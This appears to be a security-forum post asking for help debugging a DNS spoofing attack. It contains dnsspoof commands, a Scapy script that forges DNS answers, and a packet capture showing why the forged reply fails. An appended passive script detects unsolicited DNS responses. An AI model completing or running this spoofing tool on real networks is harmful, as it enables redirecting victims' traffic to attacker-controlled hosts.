Hello, BT

I am trying to do some DNS spoofing using dnsspoof. Simply using
Code:
dnsspoof -ieth1
does nothing, and
Code:
dnsspoof -ieth1 udp dst port 53
only fools my host (not very useful).

I tried writing a Scapy script to do the spoofing:
Code:
#!/usr/bin/env python

import socket
import scapy
import sys
from scapy.all import *

SPOOF_ADDR=sys.argv[1]

while 1 :
	print 'Waiting for DNS query...'
	a=sniff(filter="udp dst port 53", count=1)
	request=a[0]
	response=Ether(src=request.dst,dst=request.src)/IP(src=request.getlayer(IP).dst, dst=request.getlayer(IP).src)/UDP()/DNS(qr=1L, rd=1L, ra=1L, an=DNSRR(rrname=request.qd.qname, type='A', rclass='IN', ttl=10, rdata=SPOOF_ADDR),qd=request.qd)
	sendp(response, iface="eth1")
This doesn't work either, but I have no idea why. The spoofed packet seems almost indistinguishable from a real response (to my eyes, at least) but the clients are not fooled.

Here is a packet log taken while running my script:
Code:
No.     Time        Source                Destination           Protocol Info
  20414 1943.450319 X.X.117.233        X.X.2.26           DNS      Standard query A google.com

Frame 20414: 70 bytes on wire (560 bits), 70 bytes captured (560 bits)
Ethernet II, Src: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX), Dst: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
    Destination: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
    Source: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
    Type: IP (0x0800)
Internet Protocol, Src: X.X.117.233 (X.X.117.233), Dst: X.X.2.26 (X.X.2.26)
User Datagram Protocol, Src Port: 33250 (33250), Dst Port: domain (53)
Domain Name System (query)
    [Response In: 20449]
    Transaction ID: 0x4c6c
    Flags: 0x0100 (Standard query)
    Questions: 1
    Answer RRs: 0
    Authority RRs: 0
    Additional RRs: 0
    Queries
        google.com: type A, class IN
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)

No.     Time        Source                Destination           Protocol Info
  20416 1943.477886 X.X.2.26           X.X.117.233        DNS      Standard query response A X.X.117.233

Frame 20416: 96 bytes on wire (768 bits), 96 bytes captured (768 bits)
Ethernet II, Src: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY), Dst: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
    Destination: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
    Source: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
    Type: IP (0x0800)
Internet Protocol, Src: X.X.2.26 (X.X.2.26), Dst: X.X.117.233 (X.X.117.233)
User Datagram Protocol, Src Port: domain (53), Dst Port: domain (53)
Domain Name System (response)
    Transaction ID: 0x0000
    Flags: 0x8180 (Standard query response, No error)
    Questions: 1
    Answer RRs: 1
    Authority RRs: 0
    Additional RRs: 0
    Queries
        google.com: type A, class IN
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
    Answers
        google.com: type A, class IN, addr X.X.117.233
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 10 seconds
            Data length: 4
            Addr: X.X.117.233 (X.X.117.233)

No.     Time        Source                Destination           Protocol Info
  20449 1943.833154 X.X.2.26           X.X.117.233        DNS      Standard query response A 74.125.67.103 A 74.125.67.104 A 74.125.67.105 A 74.125.67.106 A 74.125.67.147 A 74.125.67.99

Frame 20449: 166 bytes on wire (1328 bits), 166 bytes captured (1328 bits)
Ethernet II, Src: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY), Dst: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
    Destination: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
    Source: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
    Type: IP (0x0800)
Internet Protocol, Src: X.X.2.26 (X.X.2.26), Dst: X.X.117.233 (X.X.117.233)
User Datagram Protocol, Src Port: domain (53), Dst Port: 33250 (33250)
Domain Name System (response)
    [Request In: 20414]
    [Time: 0.382835000 seconds]
    Transaction ID: 0x4c6c
    Flags: 0x8180 (Standard query response, No error)
    Questions: 1
    Answer RRs: 6
    Authority RRs: 0
    Additional RRs: 0
    Queries
        google.com: type A, class IN
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
    Answers
        google.com: type A, class IN, addr 74.125.67.103
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute, 24 seconds
            Data length: 4
            Addr: 74.125.67.103 (74.125.67.103)
        google.com: type A, class IN, addr 74.125.67.104
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute, 24 seconds
            Data length: 4
            Addr: 74.125.67.104 (74.125.67.104)
        google.com: type A, class IN, addr 74.125.67.105
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute, 24 seconds
            Data length: 4
            Addr: 74.125.67.105 (74.125.67.105)
        google.com: type A, class IN, addr 74.125.67.106
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute, 24 seconds
            Data length: 4
            Addr: 74.125.67.106 (74.125.67.106)
        google.com: type A, class IN, addr 74.125.67.147
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute, 24 seconds
            Data length: 4
            Addr: 74.125.67.147 (74.125.67.147)
        google.com: type A, class IN, addr 74.125.67.99
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute, 24 seconds
            Data length: 4
            Addr: 74.125.67.99 (74.125.67.99)
The first packet is the DNS query from my host (nslookup google.com).
The second is the spoofed response, and the third is the actual response from the NS.

Does anybody here see my mistake? I'm at a loss.
Thanks in advance,
-d1g
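
Added example (not part of the original post): a passive check a defender could run over the capture above, pairing each DNS response with an outstanding query by client address, client port, transaction ID and question, and flagging any response that matches none. The names Pkt, CAPTURE, classify and alerts are made up for this sketch, and the records are built by hand from the three frames as posted.

```python
from collections import namedtuple

# Records built by hand from the three frames in the capture above
# (addresses left redacted exactly as posted).
Pkt = namedtuple("Pkt", "frame src dst sport dport txid is_response qname answers")

CAPTURE = [
    Pkt(20414, "X.X.117.233", "X.X.2.26", 33250, 53, 0x4C6C, False, "google.com", ()),
    Pkt(20416, "X.X.2.26", "X.X.117.233", 53, 53, 0x0000, True, "google.com",
        ("X.X.117.233",)),
    Pkt(20449, "X.X.2.26", "X.X.117.233", 53, 33250, 0x4C6C, True, "google.com",
        ("74.125.67.103", "74.125.67.104", "74.125.67.105",
         "74.125.67.106", "74.125.67.147", "74.125.67.99")),
]


def classify(packets):
    """Return {frame: verdict} for every DNS response in the capture."""
    pending = {}   # (client, server, client_port, txid, qname) -> query frame
    answered = {}  # same key -> answer set of the first matching response
    verdicts = {}
    for p in packets:
        if not p.is_response:
            pending[(p.src, p.dst, p.sport, p.txid, p.qname.lower())] = p.frame
            continue
        # A response is keyed from the client's point of view.
        key = (p.dst, p.src, p.dport, p.txid, p.qname.lower())
        if key in pending:
            del pending[key]
            answered[key] = set(p.answers)
            verdicts[p.frame] = "matched"
        elif key in answered:
            same = answered[key] == set(p.answers)
            verdicts[p.frame] = "duplicate" if same else "conflicting-duplicate"
        else:
            verdicts[p.frame] = "unsolicited"
    return verdicts


def alerts(packets):
    """Frames worth an analyst's attention: anything not cleanly matched."""
    return sorted(f for f, v in classify(packets).items() if v != "matched")


if __name__ == "__main__":
    for frame, verdict in sorted(classify(CAPTURE).items()):
        print(frame, verdict)
```

On the posted capture, frame 20416 is reported as unsolicited and frame 20449 as matched; a second, differing answer to an already answered query would be reported as conflicting-duplicate.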